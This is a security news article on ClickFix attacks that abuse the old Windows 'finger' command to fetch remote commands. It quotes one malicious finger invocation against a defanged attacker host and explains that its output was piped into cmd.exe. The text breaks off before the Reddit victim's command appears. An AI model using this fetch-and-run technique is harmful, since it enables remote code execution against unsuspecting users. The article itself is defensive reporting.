Decades-old ‘finger’ Protocol Abused In Clickfix Malware Attacks

The decades-old "finger" command is making a comeback,, with threat actors using the protocol to retrieve remote commands to execute on Windows devices.

In the past, people used the finger command to look up information about local and remote users on Unix and Linux systems via the Finger protocol, a command later added to Windows. While still supported, it's rarely used today compared to its popularity decades ago.

When executed, the finger command returns basic information about a user, including their login name, name (if set in /etc/passwd), home directory, phone numbers, last seen, and other details.

Recently, there have been malicious campaigns utilizing the Finger protocol in what appear to be ClickFix attacks that retrieve commands to execute on devices.

This is not the first time the finger command has been abused in this way, as researchers warned in 2020 that it was used as a LOLBIN to download malware and evade detection.

Last month, cybersecurity researcher MalwareHunterTeam shared a batch file [VirusTotal] with BleepingComputer that, when executed, would use the "finger [email protected][.]com" command to retrieve commands from a remote finger server, which were then run locally by piping them through cmd.exe.

While that host is no longer accessible, MalwareHunterTeam found additional malware samples and attacks utilizing the finger command.

For example, a person on Reddit recently warned that they fell victim to a ClickFix attack that impersonated a Captcha, prompting them to run a Windows command to verify they were human.

"I just fell for verify you are human win + r. What do I do?," reads the Reddit post.

"I was in a rush and fell for this and ended up entering the following in my cmd prompt:"

Source: BleepingComputer